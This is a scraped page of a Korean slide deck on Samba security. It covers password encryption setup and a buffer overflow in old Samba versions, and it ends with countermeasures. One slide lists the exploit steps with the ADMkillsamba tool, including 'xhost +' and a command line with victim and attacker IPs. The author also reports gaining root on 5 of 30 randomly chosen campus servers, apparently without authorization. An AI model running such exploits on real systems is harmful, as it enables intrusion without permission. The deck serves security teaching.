Samba와 보안 PLUS 오태호.

Slides:



Advertisements
Similar presentations
SPARCS 10 이 가 영 기본 UNIX 명령어. 일단 로그인 ! Linux login 시 계정을 입력하거나 root 를 입력 Root -> # 일반 사용자 -> $ 패스워드 : echo 기능을 꺼서 볼 수 없다. 대소문자 구분 패스워드 처음 설정 시 : ~$ passwd.
Advertisements

7 장. 원격지에서 리눅스서버를 관리하자. 텔넷서버를 설치 / 운영한다. SSH 서버를 운영한다. VNC 서버를 설치 / 운영한다.
리눅스와 보안 PLUS 오태호.
정보 보안 개론과 실습 네트워크 해킹과 보안 3부 해킹 전 정보 획득 Chapter 10. 목록화.
MS SQL Server 학기, 소프트웨어 설계 및 실험 ( Ⅰ )
Chapter 10장 솔라리스 자원 관리 및 프로젝트 관리 Solaris2. 프로젝트 관리
제8장 네트워킹.
암호화 기술(SSL, IPSec) 손재성 권기읍 안복선 최준혁
2005년 배출업소 환경관리실태 평가결과 환 경 부.
Windows Server 장. Windows Server 2008 개요.
PXA270 개발환경 설정 Ubuntu 실습용.
오 태 호 POSTECH Laboratory for UNIX Security
오 태 호 POSTECH Laboratory for UNIX Security
Linux/UNIX Programming
Minicom,tftp,nfs설정,vnc설정
목 차 1. 기 업 현 황 회 사 개 요 2. Finger Police System 개요
Tftp, nfs, samba 실습 임베디드 시스템 I.
리눅스와 보안 PLUS 오태호.
Hostname 변경 및 Service open
Samba And VNC.
Vsftpd 를 이용한 FTP service 와 samba 서버 구축
1.Redhat 자격증 고급 자격증 RHCA 중급 자격증 RHCE 초급 자격증 RHCVA RHCSA RHCJA
Mysql Install on Azure
(개정판) 뇌를 자극하는 Red Hat Fedora 리눅스 서버 & 네트워크
15장. Samba 서버의 설치와 운영.
취약점 명 CVSS 7.5 개요 위험도 상 보안 등급 긴급 취약한 제품 제조사 취약점 유형 시스템 인터넷 해커 보안대책 출처
포항공과대학교 PLUS 오태호(PLUS015)
리눅스 기본 명령어 기본 명령어 명령어 기능 사 용 예 date 날짜 및 시간을 확인하고 생성.
Root Filesystem Porting
Root Filesystem Porting
1.Redhat 자격증 고급 자격증 RHCA 중급 자격증 RHCE 초급 자격증 RHCVA RHCSA RHCJA
뇌를 자극하는 Windows Server 장. Windows Server 2008 개요.
프로젝트 발표 순서 12/7(수), 팀 별 15분 발표순서 PPT (팀 별 이름, 구현 내용, 결과-그래프 포함) 각 기법당
3장. CentOS 리눅스 설치.
How to install SAS 서울대학교 보건대학원 보건통계학 개론.
시스템 인터페이스 Lab3 Unix 사용법 실습.
? SMB (Server Message Block)
㈜시스원이 제공하는 시스템 관리 통합 솔루션 SysmanagerOne Agent설치 안내서
「 LINUX IBM SpectrumScale 설치 가이드」
설치 환경 □ 운영체제 버전 : CentOS Linux 7.2 □ 리눅스 커널 버전 :
임베디드 시스템 개론 임베디드 타겟 보드 포팅 및 H/W 제어 3일차 강의 자료 Embedded System Lab.
툴 설치 가이드 PrimeTime SynopsysMentor.
제8장 네트워킹 숙명여대 창병모
Linux/UNIX Programming
UNIX 사용자를 위한 디렉토리 보안 (유닉스 프로그래밍 및 실습 - 텀 프로젝트 )
화면 갈무리 및 파일 권한 설정.
setuid, setgid, sticky bit 권한
Root passwd 분실, bootblk 복구
Linux 9.X 기초에서 활용까지 Chapter 03 리눅스 설치.
리눅스 커널 프로그래밍 환경 구축 IT EXPERT 리눅스 커널 프로그래밍 Author : Byungki Kim
어린이집.
Unix 방문(접속하여 로그인) 하기 수퍼 유저 되어 사용자 계정 만들기 Unix의 아파치 웹 서버에 홈페이지 등록하기
STS 에서 웹 서버 설치 방법.
프린터 서버 최재우.
2장. 솔라리스10 설치. 2장. 솔라리스10 설치 Solaris 3. 솔라리스10 설치 후 설정하기 1. 텔넷 ( telnet ) 서비스 사용 SSH ( Secure Shell ) 서비스 사용 FTP ( File Transfer Protocol )서비스 사용 시스템.
Chapter 36 File Transfer Concepts
Linux 9.X 기초에서 활용까지 Chapter 06 VI 편집기.
Execution with Unnecessary Privileges
타인을 내편으로 만드는 12가지 방법 고객서비스팀.
웹 애플리케이션 보안 Trend 인포섹㈜ 신수정 상무
시스템 인터페이스 Lab1 X-window 및 명령어 사용.
Chapter 17 BOOTP and DHCP.
성전기공식(안) 식 순 1. 기공미사 2. 기 공 식 3. 축 하 연 천주교 수원교구 퇴촌성당.
유예 X-FILE *조사자* 1301권희원 1315이예지 1317장아정 1322홍자현.
Chapter 07. 사용자 관리 Solaris3. 사용자 암호 관리 및 소유권 관리
소리가 작으면 이어폰 사용 권장!.
Exporting User Certificate from Internet Explorer
한국 휴렛팩커드/고객지원사업본부/IT 기술사업부 박기영
네트워크 프로토콜.
11월 고등부 공과설교 업드림? 업드림! 갈라디아서 6:9-10.
Presentation transcript:

Samba와 보안 PLUS 오태호

목차 Samba는 무엇인가? Samba Server의 Encryption지원 Samba Server의 Buffer Overflow

Samba는 무엇인가? Samba is a suite of programs which work together to allow clients to access to a server's filespace and printers via the SMB(Server Message Block) protocol.

Samba Server의 Encryption(1) % cat /etc/passwd | mksmbpasswd.sh > /etc/smbpasswd % chmod 600 /etc/smbpasswd % chown root `which smbpasswd` % chmod 4555 `which smbpasswd` /etc/smb.conf 안에 다음과 같이 설정 [global] encrypt passwords = yes smb passwd file = /etc/smbpasswd samba server를 재시동시킴 password를 바꿀 때는 smbpasswd 명령어를 사용

Samba Server의 Encryption(2) password정보가 전송될 때 encryption되기 때문에 sniffer를 이용한 공격이 어려워짐 기존의 UNIX에서 쓰던 encryption방식과 다르기 때문에 password file을 따로 관리해야되는 불편이 있음 WindowsNT 4.0 service pack 3에서는 기본적으로 지원

Samba Server의 Buffer Overflow(1) samba server로 password정보를 보낼 때 password를 길게 보내면 buffer overflow가 일어나서 외부사용자가 root권한을 획들할 가능성이 있음 samba server 1.9.17p1이하의 samba server는 위와 같은 buffer overflow의 가능성이 있음 ( redhat linux 4.x에 기본적으로 설치되어 있음 )

Samba Server의 Buffer Overflow(2) 현재 intel계열에서 작동하고 있는 samba server를 공격하는 program을 인터넷에서 구할 수 있음 (ADMkillsamba) 하지만 외부에서 buffer size와 offset을 알아내기가 힘들기 때문에 root권한을 얻기가 쉽지 않음

Samba Server의 Buffer Overflow(3) 공격 방법 samba source code를 구함 smb.h에서 typedef char pstring[1024]; 를 typedef char pstring[20000]; 와 같이 고침 % make smbclient % xhost + ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buffsize] [offset size] 와 같은 형식으로 실행 % ADMkillsamba R 141.223.4.200 ACNET 141.223.124.30 3081 2400 buffsize와 offsetsize를 바꿔 가며 계속 시도

Samba Server의 Buffer Overflow(4) 학교에 있는 linux server중 30대를 무작위로 선택해서 시험해 본 결과 5대에서 root권한을 얻을 수 있었음 대책 samba server를 작동시키지 않음 samba server를 최신 version으로 교체 ftp://samba.anu.edu.au/pub/samba/